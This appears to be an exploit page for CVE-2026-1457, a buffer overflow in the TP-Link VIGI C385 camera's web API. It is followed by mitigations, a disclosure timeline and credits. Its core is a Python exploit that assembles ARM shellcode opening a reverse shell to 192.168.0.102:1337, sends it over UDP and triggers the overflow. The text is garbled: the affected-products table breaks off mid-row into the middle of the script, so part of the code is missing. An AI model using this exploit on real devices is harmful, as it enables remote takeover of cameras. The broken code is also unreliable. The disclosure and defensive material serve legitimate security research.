## https://sploitus.com/exploit?id=CC1D56AF-F7B8-5203-9C59-616C8951D3A5
# CVE-2026-1457: TP-Link VIGI C385 Authenticated Remote Code Execution
## Overview
CVE-2026-1457 is an authenticated buffer overflow vulnerability in the web API of TP-Link VIGI C385 V1. This vulnerability allows authenticated attackers to perform remote code execution (RCE).
**CVSS v4.0 Score: 8.5 (High)**
**CVSS:4.0/AV:A/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N**
## Affected Products
| Product Model | Affected Version |
|--------------|-----------------|
| VIGI C385 V1 | syscall 114 (ARM)
""" + shellcraft.syscall(114) + """
// connect + dupsh
""" + shellcraft.thumb.linux.connect('192.168.0.102', 1337) + \
shellcraft.thumb.linux.dupsh() + """
b the_end
parent:
mov r0, #0
mov r7, #1 // sys_exit
svc #0
the_end:
"""
payload = asm(sc_asm)
SERVER_HOST = '192.168.0.100'
SERVER_PORT = 20002
SERVER = (SERVER_HOST, SERVER_PORT)
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.sendto(payload, SERVER)
sock.close()
print(asm(sc_asm).hex())
print(f"[+] Sent {len(payload)} bytes of ARM shellcode to 192.168.0.100:20002")
send_shellcode()
time.sleep(1)
buffer_overflow()
```
### Exploitation Result
The following screenshot demonstrates successful exploitation resulting in a reverse shell connection:

## Mitigation
### Recommended Actions
1. **Firmware Update**: Update affected devices to version **3.1.1 Build 251124 Rel.50371n** or later.
2. **Network Isolation**: If possible, place VIGI C385 devices in an isolated network segment.
3. **Access Control**: Restrict access to the management interface to trusted networks only.
4. **Monitoring**: Monitor for abnormal network traffic or device behavior.
### Temporary Mitigation Measures
- Block external access to the web management interface.
- Use strong authentication credentials.
- Disable unnecessary network services.
## Timeline
- **2026-01-XX**: Vulnerability discovered
- **2026-01-XX**: Vulnerability reported to TP-Link
- **2026-01-29**: Security advisory published
- **2026-01-29**: Public disclosure
## References
- [TP-Link Security Advisory](https://www.tp-link.com/support/security-advisory/)
- CVE-2026-1457
## Disclaimer
This information is provided for educational and security research purposes only. The use of this information for malicious purposes is strictly prohibited. The authors assume no responsibility for any misuse of this information.
## License
This project is provided for educational and security research purposes only.
## Credits
This vulnerability was discovered and analyzed by:
- SeonGoo Lee (classun9)
- MinSeong Kim (ii4gsp)
of NSHC RedAlert Labs
---
**โ ๏ธ Warning**: This vulnerability can allow remote code execution on actual devices. Please use this information responsibly in accordance with responsible disclosure principles.